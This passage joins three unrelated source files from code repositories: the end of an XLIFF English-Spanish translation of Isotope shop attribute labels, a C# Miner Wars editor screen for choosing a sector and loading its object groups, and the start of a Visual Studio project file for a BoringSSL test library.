fecha</target> </trans-unit> <trans-unit id="tl_iso_attribute.datepicker.1"> <source>Show a date picker for this field.</source> <target>Mostrar un selector de fecha para este campo.</target> </trans-unit> <trans-unit id="tl_iso_attribute.chunking.0"> <source>Enable chunking</source> </trans-unit> <trans-unit id="tl_iso_attribute.chunking.1"> <source>Enable the file chunking. It is useful to upload big files.</source> </trans-unit> <trans-unit id="tl_iso_attribute.chunkSize.0"> <source>Chunk size in bytes</source> </trans-unit> <trans-unit id="tl_iso_attribute.chunkSize.1"> <source>Please enter the chunk size in bytes (1MB = 1000000 bytes).</source> </trans-unit> <trans-unit id="tl_iso_attribute.optionsTable_edit"> <source>Edit options</source> </trans-unit> <trans-unit id="tl_iso_attribute.checkbox"> <source>Checkbox</source> <target>Casilla</target> </trans-unit> <trans-unit id="tl_iso_attribute.radio"> <source>Radio</source> <target>Opción</target> </trans-unit> <trans-unit id="tl_iso_attribute.digit.0"> <source>Numeric characters</source> <target>Caracteres numéricos</target> </trans-unit> <trans-unit id="tl_iso_attribute.digit.1"> <source>Allows numeric characters, minus (-), full stop (.) and space ( ).</source> <target>Permite caracteres numéricos, menos (-), punto (.) y espacio ( ).</target> </trans-unit> <trans-unit id="tl_iso_attribute.alpha.0"> <source>Alphabetic characters</source> <target>Caracteres alfabéticos</target> </trans-unit> <trans-unit id="tl_iso_attribute.alpha.1"> <source>Allows alphabetic characters, minus (-), full stop (.) and space ( ).</source> <target>Permite caracteres alfabéticos, menos (-), punto (.) 
y espacio ( ).</target> </trans-unit> <trans-unit id="tl_iso_attribute.alnum.0"> <source>Alphanumeric characters</source> <target>Caracteres alfanuméricos</target> </trans-unit> <trans-unit id="tl_iso_attribute.alnum.1"> <source>Allows alphabetic and numeric characters, minus (-), full stop (.), underscore (_) and space ( ).</source> <target>Permite caracteres alfabéticos y numéricos, menos (-), punto (.), guion bajo (_) y espacio ( ).</target> </trans-unit> <trans-unit id="tl_iso_attribute.extnd.0"> <source>Extended alphanumeric characters</source> <target>Caracteres alfanuméricos extendidos</target> </trans-unit> <trans-unit id="tl_iso_attribute.extnd.1"> <source>Allows everything except special characters which are usually encoded for security reasons (#/()&lt;=&gt;).</source> <target>Permite todo excepto caracteres especiales que generalmente están codificados por razones de seguridad (#/()&lt;=&gt;).</target> </trans-unit> <trans-unit id="tl_iso_attribute.date.0"> <source>Date</source> <target>Fecha</target> </trans-unit> <trans-unit id="tl_iso_attribute.date.1"> <source>Checks whether the input matches the global date format.</source> <target>Comprueba si la entrada coincide con el formato de fecha global.</target> </trans-unit> <trans-unit id="tl_iso_attribute.time.0"> <source>Time</source> <target>Hora</target> </trans-unit> <trans-unit id="tl_iso_attribute.time.1"> <source>Checks whether the input matches the global time format.</source> <target>Comprueba si la entrada coincide con el formato de la hora global.</target> </trans-unit> <trans-unit id="tl_iso_attribute.datim.0"> <source>Date and time</source> <target>Fecha y Hora</target> </trans-unit> <trans-unit id="tl_iso_attribute.datim.1"> <source>Checks whether the input matches the global date and time format.</source> <target>Comprueba si la entrada coincide con el formato global de fecha y de hora.</target> </trans-unit> <trans-unit id="tl_iso_attribute.phone.0"> <source>Phone number</source> <target>Teléfono</target> 
</trans-unit> <trans-unit id="tl_iso_attribute.phone.1"> <source>Allows numeric characters, plus (+), minus (-), slash (/), parentheses () and space ( ).</source> <target>Permite caracteres numéricos, mas (+), menos (-), barra (/), paréntesis () y espacio ( ).</target> </trans-unit> <trans-unit id="tl_iso_attribute.email.0"> <source>E-mail address</source> <target>E-mail</target> </trans-unit> <trans-unit id="tl_iso_attribute.email.1"> <source>Checks whether the input is a valid e-mail address.</source> <target>Comprueba si la entrada es una dirección de correo electrónico válida.</target> </trans-unit> <trans-unit id="tl_iso_attribute.url.0"> <source>URL format</source> <target>Formato de URL</target> </trans-unit> <trans-unit id="tl_iso_attribute.url.1"> <source>Checks whether the input is a valid URL.</source> <target>Comprueba si la entrada es una URL válida.</target> </trans-unit> <trans-unit id="tl_iso_attribute.price.0"> <source>Price</source> <target>Precio</target> </trans-unit> <trans-unit id="tl_iso_attribute.price.1"> <source>Checks whether the input is a valid price.</source> <target>Comprueba si la entrada es un precio válido.</target> </trans-unit> <trans-unit id="tl_iso_attribute.discount.0"> <source>Discount</source> <target>Descuento</target> </trans-unit> <trans-unit id="tl_iso_attribute.discount.1"> <source>Checks whether the input is a valid discount.&lt;br /&gt;Example: -10%, -10, +10, +10%</source> <target>Comprueba si la entrada es un descuento válido &lt;br /&gt; Ejemplo:. -10%, -10, 10, +10%</target> </trans-unit> <trans-unit id="tl_iso_attribute.surcharge.0"> <source>Surcharge</source> <target>Recargo</target> </trans-unit> <trans-unit id="tl_iso_attribute.surcharge.1"> <source>Checks whether the input is a valid surcharge.&lt;br /&gt;Example: 10.00, 10%</source> <target>Comprueba si la entrada es un recargo válido &lt;br /&gt; Ejemplo:. 
10.00, 10%</target> </trans-unit> <trans-unit id="tl_iso_attribute.custom"> <source>Custom order</source> </trans-unit> <trans-unit id="tl_iso_attribute.name_asc"> <source>File name (ascending)</source> <target>Nombre de archivo (ascendente)</target> </trans-unit> <trans-unit id="tl_iso_attribute.name_desc"> <source>File name (descending)</source> <target>Nombre de archivo (descendente)</target> </trans-unit> <trans-unit id="tl_iso_attribute.date_asc"> <source>Date (ascending)</source> <target>Fecha (ascendente)</target> </trans-unit> <trans-unit id="tl_iso_attribute.date_desc"> <source>Date (descending)</source> <target>Fecha (descendente)</target> </trans-unit> <trans-unit id="tl_iso_attribute.random"> <source>Random order</source> <target>Orden aleatorio</target> </trans-unit> <trans-unit id="tl_iso_attribute.checkout_tokens.0"> <source>Use these simple tokens to generate a dynamic folder name.</source> </trans-unit> <trans-unit id="tl_iso_attribute.checkout_tokens.1.0"> <source>##document_number##</source> </trans-unit> <trans-unit id="tl_iso_attribute.checkout_tokens.1.1"> <source>Generated document number for the order.</source> </trans-unit> <trans-unit id="tl_iso_attribute.checkout_tokens.2.0"> <source>##order_id##</source> <target>##order_id##</target> </trans-unit> <trans-unit id="tl_iso_attribute.checkout_tokens.2.1"> <source>Database ID of the order record.</source> </trans-unit> <trans-unit id="tl_iso_attribute.checkout_tokens.3.0"> <source>##order_date##</source> </trans-unit> <trans-unit id="tl_iso_attribute.checkout_tokens.3.1"> <source>Date of the order as timestamp. 
Use insert tags &lt;i&gt;{{formatted_datetime::*}}&lt;/i&gt; to convert timestamp to formatted date.</source> </trans-unit> <trans-unit id="tl_iso_attribute.checkout_tokens.4.0"> <source>##product_id##</source> </trans-unit> <trans-unit id="tl_iso_attribute.checkout_tokens.4.1"> <source>Database ID of the product.</source> </trans-unit> <trans-unit id="tl_iso_attribute.checkout_tokens.5.0"> <source>##product_sku##</source> </trans-unit> <trans-unit id="tl_iso_attribute.checkout_tokens.5.1"> <source>SKU of the product.</source> </trans-unit> <trans-unit id="tl_iso_attribute.checkout_tokens.6.0"> <source>##product_name##</source> </trans-unit> <trans-unit id="tl_iso_attribute.checkout_tokens.6.1"> <source>Name of the product.</source> </trans-unit> <trans-unit id="tl_iso_attribute.checkout_tokens.7.0"> <source>##product_position##</source> </trans-unit> <trans-unit id="tl_iso_attribute.checkout_tokens.7.1"> <source>Position of the product on the order document, starting from 1.</source> </trans-unit> <trans-unit id="tl_iso_attribute.checkout_tokens.8.0"> <source>##attribute_field##</source> </trans-unit> <trans-unit id="tl_iso_attribute.checkout_tokens.8.1"> <source>Database field name of the attribute.</source> </trans-unit> <trans-unit id="tl_iso_attribute.checkout_tokens.9.0"> <source>##attribute_name##</source> </trans-unit> <trans-unit id="tl_iso_attribute.checkout_tokens.9.1"> <source>Name of the attribute.</source> </trans-unit> <trans-unit id="tl_iso_attribute.checkout_tokens.10.0"> <source>##file_name##</source> </trans-unit> <trans-unit id="tl_iso_attribute.checkout_tokens.10.1"> <source>Full file name and extension as uploaded by the user.</source> </trans-unit> <trans-unit id="tl_iso_attribute.checkout_tokens.11.0"> <source>##file_target##</source> </trans-unit> <trans-unit id="tl_iso_attribute.checkout_tokens.11.1"> <source>Full file name and extension as uploaded by the user, but renamed if &quot;Preserve existing files&quot; is enabled and a file with 
same name exists in target folder. &lt;br&gt;&lt;strong&gt;Only available for the file name, not for the folder!&lt;/strong&gt;</source> </trans-unit> <trans-unit id="tl_iso_attribute.checkout_tokens.12.0"> <source>##file_extension##</source> </trans-unit> <trans-unit id="tl_iso_attribute.checkout_tokens.12.1"> <source>The original file extension.</source> </trans-unit> <trans-unit id="tl_iso_attribute.checkout_tokens.13.0"> <source>##has_member##</source> </trans-unit> <trans-unit id="tl_iso_attribute.checkout_tokens.13.1"> <source>1 if a member is signed in to the frontend, 0 if not.</source> </trans-unit> <trans-unit id="tl_iso_attribute.checkout_tokens.14.0"> <source>##member_*##</source> </trans-unit> <trans-unit id="tl_iso_attribute.checkout_tokens.14.1"> <source>If a user is logged in, all member fields are available as tokens.</source> </trans-unit> <trans-unit id="tl_iso_attribute.new.0"> <source>New attribute</source> <target>Nuevo atributo</target> </trans-unit> <trans-unit id="tl_iso_attribute.new.1"> <source>Create a new attribute.</source> <target>Crear un nuevo atributo</target> </trans-unit> <trans-unit id="tl_iso_attribute.edit.0"> <source>Edit attribute</source> <target>Editar atributo</target> </trans-unit> <trans-unit id="tl_iso_attribute.edit.1"> <source>Edit attribute ID %s.</source> <target>Editar atributo ID %s</target> </trans-unit> <trans-unit id="tl_iso_attribute.copy.0"> <source>Copy attribute</source> <target>Copiar atributo</target> </trans-unit> <trans-unit id="tl_iso_attribute.copy.1"> <source>Copy attribute ID %s.</source> <target>Copiar atributo ID %s</target> </trans-unit> <trans-unit id="tl_iso_attribute.delete.0"> <source>Delete attribute</source> <target>Borrar atributo</target> </trans-unit> <trans-unit id="tl_iso_attribute.delete.1"> <source>Delete attribute ID %s. 
The database column will not be deleted, you need to manually update the database using the install tool or repository manager.</source> <target>Borrar atributo ID %s. La columna de base de datos no será eliminada, es necesario actualizar manualmente la base de datos utilizando la herramienta de instalación o el repository manager.</target> </trans-unit> <trans-unit id="tl_iso_attribute.show.0"> <source>Attribute details</source> <target>Detalles de atributos</target> </trans-unit> <trans-unit id="tl_iso_attribute.show.1"> <source>Show details for attribute ID %s.</source> <target>Mostrar los detalles del atributo ID %s</target> </trans-unit> <trans-unit id="tl_iso_attribute.deleteConfirm"> <source>Do you really want to delete attribute ID %s? The database column will not be deleted, you need to manually update the database using the install tool or repository manager.</source> <target>¿Está seguro que quiere eliminar el atributo ID %s? La columna de la base de datos no será eliminada, es necesario actualizar manualmente la base de datos utilizando la herramienta de instalación o el repository manager.</target> </trans-unit> <trans-unit id="tl_iso_attribute.attribute_legend"> <source>Attribute name &amp; type</source> <target>Nombre y tipo de atributo </target> </trans-unit> <trans-unit id="tl_iso_attribute.description_legend"> <source>Description</source> <target>Descripción</target> </trans-unit> <trans-unit id="tl_iso_attribute.options_legend"> <source>Options</source> <target>Opciones</target> </trans-unit> <trans-unit id="tl_iso_attribute.config_legend"> <source>Attribute configuration</source> <target>Configuración del atributo</target> </trans-unit> <trans-unit id="tl_iso_attribute.search_filters_legend"> <source>Search &amp; Filtering Settings</source> <target>Opciones de Búsqueda y Filtrado</target> </trans-unit> <trans-unit id="tl_iso_attribute.store_legend"> <source>Store file</source> <target>Archivo de la tienda</target> </trans-unit> </body> </file> 
</xliff>
{ "pile_set_name": "Github" }
using System; using System.Collections.Generic; using System.Linq; using System.Text; using MinerWars.AppCode.Game.GUI.Core; using MinerWars.AppCode.Game.Localization; using MinerWars.CommonLIB.AppCode.Networking; using MinerWarsMath; using MinerWars.AppCode.Game.Utils; using MinerWars.AppCode.Game.World; using SysUtils.Utils; //using MinerWars.CommonLIB.MasterServerService; using System.IO; using MinerWars.CommonLIB.AppCode.ObjectBuilders; using System.Diagnostics; using MinerWars.AppCode.Networking.SectorService; using System.ServiceModel; namespace MinerWars.AppCode.Game.GUI.ScreenEditor { class MyGuiScreenEditorSelectSector : MyGuiScreenBase { MyGuiControlCombobox m_mapsCombobox; List<MyMwcSectorIdentifier> m_sectorIdentifiers; List<MyMwcUserDetail> m_userDetails; MyGuiControlTextbox m_findPlayerName; public MyGuiScreenEditorSelectSector() : base(new Vector2(0.5f, 0.5f), MyGuiConstants.SCREEN_BACKGROUND_COLOR, new Vector2(0.5f, 0.5f)) { m_enableBackgroundFade = true; m_sectorIdentifiers = null; RecreateControls(); } private void AddSectorToCombo(MyMwcSectorIdentifier sectorIdentifier, int index, string username) { if (string.IsNullOrEmpty(sectorIdentifier.SectorName)) { m_mapsCombobox.AddItem(index, new StringBuilder(string.Format("{0} ({1})", username, sectorIdentifier.Position.ToString()))); } else { m_mapsCombobox.AddItem(index, new StringBuilder(string.Format("{0} {1} ({2})", username, sectorIdentifier.SectorName, sectorIdentifier.Position.ToString()))); } } private void RecreateControls() { Controls.Clear(); AddCaption(new StringBuilder("Select Sector"), MyGuiConstants.SCREEN_CAPTION_TEXT_COLOR); Vector2 controlsOriginLeft = new Vector2(-m_size.Value.X / 2.0f + 0.04f, -m_size.Value.Y / 2.0f + 0.08f); Vector2 controlsDelta = new Vector2(0, 0.0525f); // controls for typing friend name to search Controls.Add(new MyGuiControlLabel(this, controlsOriginLeft + 1 * controlsDelta, null, MyTextsWrapperEnum.FriendName, MyGuiConstants.LABEL_TEXT_COLOR, 
MyGuiConstants.LABEL_TEXT_SCALE, MyGuiDrawAlignEnum.HORISONTAL_LEFT_AND_VERTICAL_CENTER)); m_findPlayerName = new MyGuiControlTextbox(this, controlsOriginLeft + 2 * controlsDelta + new Vector2(MyGuiConstants.TEXTBOX_MEDIUM_SIZE.X / 2.0f, 0), MyGuiControlPreDefinedSize.MEDIUM, "", 20, MyGuiConstants.TEXTBOX_BACKGROUND_COLOR, MyGuiConstants.LABEL_TEXT_SCALE, MyGuiControlTextboxType.NORMAL); Controls.Add(m_findPlayerName); // search button Controls.Add(new MyGuiControlButton(this, m_findPlayerName.GetPosition() + new Vector2(0.2f, 0), MyGuiConstants.MESSAGE_BOX_BUTTON_SIZE, MyGuiConstants.BUTTON_BACKGROUND_COLOR, MyTextsWrapperEnum.Search, MyGuiConstants.BUTTON_TEXT_COLOR, MyGuiConstants.BUTTON_TEXT_SCALE, OnSearchClick, MyGuiControlButtonTextAlignment.CENTERED, true, MyGuiDrawAlignEnum.HORISONTAL_CENTER_AND_VERTICAL_CENTER, true)); // friend maps available for selection Controls.Add(new MyGuiControlLabel(this, controlsOriginLeft + 4 * controlsDelta, null, MyTextsWrapperEnum.Map, MyGuiConstants.LABEL_TEXT_COLOR, MyGuiConstants.LABEL_TEXT_SCALE, MyGuiDrawAlignEnum.HORISONTAL_LEFT_AND_VERTICAL_CENTER)); if (m_sectorIdentifiers != null && m_userDetails != null) { m_mapsCombobox = new MyGuiControlCombobox(this, controlsOriginLeft + 5 * controlsDelta + new Vector2(MyGuiConstants.COMBOBOX_LONGMEDIUM_SIZE.X / 2.0f, 0), MyGuiControlPreDefinedSize.LONGMEDIUM, MyGuiConstants.COMBOBOX_BACKGROUND_COLOR, MyGuiConstants.COMBOBOX_TEXT_SCALE); for (int i = 0; i < m_sectorIdentifiers.Count; i++) { MyMwcSectorIdentifier sectorIdentifier = m_sectorIdentifiers[i]; if (!sectorIdentifier.UserId.HasValue) { AddSectorToCombo(sectorIdentifier, i, "STORY"); } else { foreach (MyMwcUserDetail userDetail in m_userDetails) { if (sectorIdentifier.UserId.HasValue && sectorIdentifier.UserId.Value == userDetail.UserId) { AddSectorToCombo(sectorIdentifier, i, userDetail.DisplayName); } } } } SortSectors(); m_mapsCombobox.SelectItemByIndex(0); Controls.Add(m_mapsCombobox); } else { Controls.Add(new 
// NOTE(review): this chunk begins mid-way through a Controls.Add(...) call inside
// RecreateControls(); the method header and the enclosing screen class are above
// this view. The label below is shown when the sector list is empty.
MyGuiControlLabel(this, controlsOriginLeft + 5 * controlsDelta, null, MyTextsWrapperEnum.NoSectorsAvailable, MyGuiConstants.LABEL_TEXT_COLOR, MyGuiConstants.LABEL_TEXT_SCALE, MyGuiDrawAlignEnum.HORISONTAL_LEFT_AND_VERTICAL_CENTER));
            }

            // Buttons OK and CANCEL
            Vector2 buttonDelta = new Vector2(0.1f, m_size.Value.Y / 2.0f - MyGuiConstants.MESSAGE_BOX_BORDER_AREA_Y - MyGuiConstants.MESSAGE_BOX_BUTTON_SIZE.Y / 2.0f);
            if (m_mapsCombobox != null)
            {
                // Sector list available: show both OK (load selected sector) and CANCEL.
                Controls.Add(new MyGuiControlButton(this, new Vector2(-buttonDelta.X, buttonDelta.Y), MyGuiConstants.MESSAGE_BOX_BUTTON_SIZE, MyGuiConstants.BUTTON_BACKGROUND_COLOR, MyTextsWrapperEnum.Ok, MyGuiConstants.BUTTON_TEXT_COLOR, MyGuiConstants.BUTTON_TEXT_SCALE, OnOkClick, MyGuiControlButtonTextAlignment.CENTERED, true, MyGuiDrawAlignEnum.HORISONTAL_CENTER_AND_VERTICAL_CENTER, true));
                Controls.Add(new MyGuiControlButton(this, new Vector2(+buttonDelta.X, buttonDelta.Y), MyGuiConstants.MESSAGE_BOX_BUTTON_SIZE, MyGuiConstants.BUTTON_BACKGROUND_COLOR, MyTextsWrapperEnum.Cancel, MyGuiConstants.BUTTON_TEXT_COLOR, MyGuiConstants.BUTTON_TEXT_SCALE, OnCancelClick, MyGuiControlButtonTextAlignment.CENTERED, true, MyGuiDrawAlignEnum.HORISONTAL_CENTER_AND_VERTICAL_CENTER, true));
            }
            else
            {
                // No sectors to choose from: only a centered CANCEL button.
                Controls.Add(new MyGuiControlButton(this, new Vector2(0, m_size.Value.Y / 2.0f - MyGuiConstants.MESSAGE_BOX_BORDER_AREA_Y - MyGuiConstants.MESSAGE_BOX_BUTTON_SIZE.Y / 2.0f), MyGuiConstants.MESSAGE_BOX_BUTTON_SIZE, MyGuiConstants.BUTTON_BACKGROUND_COLOR, MyTextsWrapperEnum.Cancel, MyGuiConstants.BUTTON_TEXT_COLOR, MyGuiConstants.BUTTON_TEXT_SCALE, OnCancelClick, MyGuiControlButtonTextAlignment.CENTERED, true, MyGuiDrawAlignEnum.HORISONTAL_CENTER_AND_VERTICAL_CENTER, true));
            }
        }

        // Sorts the combobox items so that sectors WITH a name come first; within
        // each group items are ordered by their display text.
        private void SortSectors()
        {
            // Named sectors first
            m_mapsCombobox.CustomSortItems((a, b) =>
            {
                // aName/bName are true when the sector name is MISSING (null/empty),
                // so a missing name (true) sorts AFTER a present name.
                bool aName = string.IsNullOrEmpty(m_sectorIdentifiers[a.Key].SectorName);
                bool bName = string.IsNullOrEmpty(m_sectorIdentifiers[b.Key].SectorName);
                return aName == bName ? a.Value.ToString().CompareTo(b.Value.ToString()) : (aName ? 1 : -1);
            });
        }

        // Callback invoked with the server's sector list; stores the results and
        // rebuilds the screen controls. A null or empty response is ignored,
        // leaving the previously shown list in place.
        public void AddSectorsResponse(List<MyMwcSectorIdentifier> sectorIdentifiers, List<MyMwcUserDetail> userDetails)
        {
            if (sectorIdentifiers != null && sectorIdentifiers.Count > 0)
            {
                m_sectorIdentifiers = sectorIdentifiers;
                m_userDetails = userDetails;
                RecreateControls();
            }
        }

        public override string GetFriendlyName()
        {
            return "MyGuiScreenEditorSelectSector";
        }

        // Search button: query sectors by player name when a name was typed,
        // otherwise fall back to requesting the STORY sector list.
        public void OnSearchClick(MyGuiControlButton sender)
        {
            if (m_findPlayerName != null && m_findPlayerName.Text != null && m_findPlayerName.Text.Length > 0)
            {
                MyGuiManager.AddScreen(new MyGuiScreenSelectSandboxProgress(MyMwcSelectSectorRequestTypeEnum.FIND_BY_PLAYER_NAME, MyTextsWrapperEnum.LoadingPleaseWait, this, m_findPlayerName.Text, AddSectorsResponse));
            }
            else
            {
                MyGuiManager.AddScreen(new MyGuiScreenSelectSandboxProgress(MyMwcSelectSectorRequestTypeEnum.STORY, MyTextsWrapperEnum.LoadingPleaseWait, this, null, AddSectorsResponse));
            }
        }

        // OK: close this screen and start loading object groups of the sector
        // currently selected in the combobox.
        public void OnOkClick(MyGuiControlButton sender)
        {
            CloseScreen();
            MyMwcSectorIdentifier sectorIdentifier = m_sectorIdentifiers[m_mapsCombobox.GetSelectedKey()];
            MyGuiManager.AddScreen(new MyGuiScreenEditorLoadObjectGroupsProgress(MyTextsWrapperEnum.LoadingPleaseWait, sectorIdentifier));
        }

        // Cancel: close this screen and return to the editor groups screen.
        public void OnCancelClick(MyGuiControlButton sender)
        {
            CloseScreen();
            MyGuiManager.AddScreen(new MyGuiScreenEditorGroups());
        }
    }

    // Progress screen that asynchronously loads the object groups of a sector
    // via the sector service and opens the "load group" screen on success.
    class MyGuiScreenEditorLoadObjectGroupsProgress : MyGuiScreenSectorServiceCallProgress
    {
        // Identifier of the sector whose object groups are being loaded.
        MyMwcSectorIdentifier m_sectorIdentifier;

        //MyMasterServerServiceClient client = MyMasterServerServiceClient.CreateInstance();
        //System.IAsyncResult saveResult;

        // Using this static public property client-server tells us about login response
        public static MyGuiScreenEditorLoadObjectGroupsProgress CurrentScreen = null; // This is always filled with a reference to the actual instance of this screen. If there isn't one, it's null.

        public MyGuiScreenEditorLoadObjectGroupsProgress(MyTextsWrapperEnum loadingText, MyMwcSectorIdentifier sectorIdentifier)
            : base(loadingText, false, TimeSpan.FromSeconds(360)) // 360 s service-call timeout
        {
            CurrentScreen = this;
            m_sectorIdentifier = sectorIdentifier;
        }

        public override string GetFriendlyName()
        {
            return "MyGuiScreenEditorLoadObjectGroupsProgress";
        }

        protected override void ServiceProgressStart(MySectorServiceClient client)
        {
            // Send the load request and wait for the callback (OnActionCompleted)
            AddAction(client.BeginLoadObjectGroups(m_sectorIdentifier.SectorType, m_sectorIdentifier.UserId, m_sectorIdentifier.Position, null, client));
        }

        protected override void OnActionCompleted(IAsyncResult asyncResult, MySectorServiceClient client)
        {
            try
            {
                var response = client.EndLoadObjectGroups(asyncResult);
                // NOTE(review): groups, entities and fakeEndpoint are never used below;
                // they appear to be leftovers from an earlier implementation — confirm
                // before removing.
                List<MyMwcObjectBuilder_ObjectGroup> groups = new List<MyMwcObjectBuilder_ObjectGroup>();
                List<MyMwcObjectBuilder_Base> entities = new List<MyMwcObjectBuilder_Base>();
                var fakeEndpoint = new System.Net.IPEndPoint(0, MyClientServer.LoggedPlayer.GetUserId());
                var sectorGroupBuilder = MyMwcObjectBuilder_Base.FromBytes<MyMwcObjectBuilder_SectorObjectGroups>(response);
                if (sectorGroupBuilder == null)
                {
                    throw new InvalidOperationException("Cannot deserialize SectorObjectGroups object builder");
                }
                MyGuiManager.AddScreen(new MyGuiScreenEditorLoadGroup(sectorGroupBuilder.Groups, sectorGroupBuilder.Entities));
            }
            catch (Exception)
            {
                // Any failure (service call or deserialization) is reported to the
                // user as a generic network error message box.
                MyGuiManager.AddScreen(new MyGuiScreenMessageBox(MyMessageBoxType.ERROR, MyTextsWrapperEnum.PleaseTryAgain, MyTextsWrapperEnum.MessageBoxNetworkErrorCaption, MyTextsWrapperEnum.Ok, null));
            }
            CloseScreen();
        }

        public override bool Update(bool hasFocus)
        {
            if (base.Update(hasFocus) == false) return false;

            // Only continue if this screen is really open (not closing or closed)
            if (GetState() != MyGuiScreenState.OPENED) return false;

            return true;
        }

        public override bool CloseScreen()
        {
            bool ret = base.CloseScreen();
            if (ret == true)
            {
                // Screen actually closed: clear the static self-reference.
                CurrentScreen = null;
            }
            return ret;
        }
    }
}
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="utf-8"?>
<!-- MSBuild project building BoringSSL's evp_test.cc into a static library
     (boringssl_evp_test_lib) for Debug/Release x Win32/x64. Appears to be
     generated from the gRPC vsprojects templates — TODO confirm before
     hand-editing, as a regeneration would overwrite manual changes. -->
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <ItemGroup Label="ProjectConfigurations">
    <ProjectConfiguration Include="Debug|Win32">
      <Configuration>Debug</Configuration>
      <Platform>Win32</Platform>
    </ProjectConfiguration>
    <ProjectConfiguration Include="Debug|x64">
      <Configuration>Debug</Configuration>
      <Platform>x64</Platform>
    </ProjectConfiguration>
    <ProjectConfiguration Include="Release|Win32">
      <Configuration>Release</Configuration>
      <Platform>Win32</Platform>
    </ProjectConfiguration>
    <ProjectConfiguration Include="Release|x64">
      <Configuration>Release</Configuration>
      <Platform>x64</Platform>
    </ProjectConfiguration>
  </ItemGroup>
  <PropertyGroup Label="Globals">
    <ProjectGuid>{87C164B2-7346-C612-4C6B-4927B29EFF9F}</ProjectGuid>
    <IgnoreWarnIntDirInTempDetected>true</IgnoreWarnIntDirInTempDetected>
    <!-- Keep intermediate outputs under the solution directory, per project name. -->
    <IntDir>$(SolutionDir)IntDir\$(MSBuildProjectName)\</IntDir>
  </PropertyGroup>
  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
  <!-- Pick the platform toolset matching the Visual Studio version in use. -->
  <PropertyGroup Condition="'$(VisualStudioVersion)' == '10.0'" Label="Configuration">
    <PlatformToolset>v100</PlatformToolset>
  </PropertyGroup>
  <PropertyGroup Condition="'$(VisualStudioVersion)' == '11.0'" Label="Configuration">
    <PlatformToolset>v110</PlatformToolset>
  </PropertyGroup>
  <PropertyGroup Condition="'$(VisualStudioVersion)' == '12.0'" Label="Configuration">
    <PlatformToolset>v120</PlatformToolset>
  </PropertyGroup>
  <PropertyGroup Condition="'$(VisualStudioVersion)' == '14.0'" Label="Configuration">
    <PlatformToolset>v140</PlatformToolset>
  </PropertyGroup>
  <!-- Both configurations produce a Unicode static library. -->
  <PropertyGroup Condition="'$(Configuration)'=='Debug'" Label="Configuration">
    <ConfigurationType>StaticLibrary</ConfigurationType>
    <UseDebugLibraries>true</UseDebugLibraries>
    <CharacterSet>Unicode</CharacterSet>
  </PropertyGroup>
  <PropertyGroup Condition="'$(Configuration)'=='Release'" Label="Configuration">
    <ConfigurationType>StaticLibrary</ConfigurationType>
    <UseDebugLibraries>false</UseDebugLibraries>
    <WholeProgramOptimization>true</WholeProgramOptimization>
    <CharacterSet>Unicode</CharacterSet>
  </PropertyGroup>
  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
  <ImportGroup Label="ExtensionSettings">
  </ImportGroup>
  <ImportGroup Label="PropertySheets">
    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
    <!-- Shared gRPC build settings and winsock configuration. -->
    <Import Project="$(SolutionDir)\..\vsprojects\global.props" />
    <Import Project="$(SolutionDir)\..\vsprojects\winsock.props" />
  </ImportGroup>
  <PropertyGroup Label="UserMacros" />
  <PropertyGroup Condition="'$(Configuration)'=='Debug'">
    <TargetName>boringssl_evp_test_lib</TargetName>
  </PropertyGroup>
  <PropertyGroup Condition="'$(Configuration)'=='Release'">
    <TargetName>boringssl_evp_test_lib</TargetName>
  </PropertyGroup>
  <!-- Debug builds: no optimization, static debug CRT (/MTd); the $(Jenkins)
       conditions strip debug info and minimal-rebuild on CI builds. -->
  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
    <ClCompile>
      <PrecompiledHeader>NotUsing</PrecompiledHeader>
      <WarningLevel>Level3</WarningLevel>
      <Optimization>Disabled</Optimization>
      <PreprocessorDefinitions>WIN32;_DEBUG;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
      <SDLCheck>true</SDLCheck>
      <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
      <TreatWarningAsError>false</TreatWarningAsError>
      <DebugInformationFormat Condition="$(Jenkins)">None</DebugInformationFormat>
      <MinimalRebuild Condition="$(Jenkins)">false</MinimalRebuild>
    </ClCompile>
    <Link>
      <SubSystem>Windows</SubSystem>
      <GenerateDebugInformation Condition="!$(Jenkins)">true</GenerateDebugInformation>
      <GenerateDebugInformation Condition="$(Jenkins)">false</GenerateDebugInformation>
    </Link>
  </ItemDefinitionGroup>
  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
    <ClCompile>
      <PrecompiledHeader>NotUsing</PrecompiledHeader>
      <WarningLevel>Level3</WarningLevel>
      <Optimization>Disabled</Optimization>
      <PreprocessorDefinitions>WIN32;_DEBUG;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
      <SDLCheck>true</SDLCheck>
      <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
      <TreatWarningAsError>false</TreatWarningAsError>
      <DebugInformationFormat Condition="$(Jenkins)">None</DebugInformationFormat>
      <MinimalRebuild Condition="$(Jenkins)">false</MinimalRebuild>
    </ClCompile>
    <Link>
      <SubSystem>Windows</SubSystem>
      <GenerateDebugInformation Condition="!$(Jenkins)">true</GenerateDebugInformation>
      <GenerateDebugInformation Condition="$(Jenkins)">false</GenerateDebugInformation>
    </Link>
  </ItemDefinitionGroup>
  <!-- Release builds: full optimization, static release CRT (/MT), COMDAT
       folding and reference elimination at link time. -->
  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
    <ClCompile>
      <PrecompiledHeader>NotUsing</PrecompiledHeader>
      <WarningLevel>Level3</WarningLevel>
      <Optimization>MaxSpeed</Optimization>
      <PreprocessorDefinitions>WIN32;NDEBUG;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
      <FunctionLevelLinking>true</FunctionLevelLinking>
      <IntrinsicFunctions>true</IntrinsicFunctions>
      <SDLCheck>true</SDLCheck>
      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
      <TreatWarningAsError>false</TreatWarningAsError>
      <DebugInformationFormat Condition="$(Jenkins)">None</DebugInformationFormat>
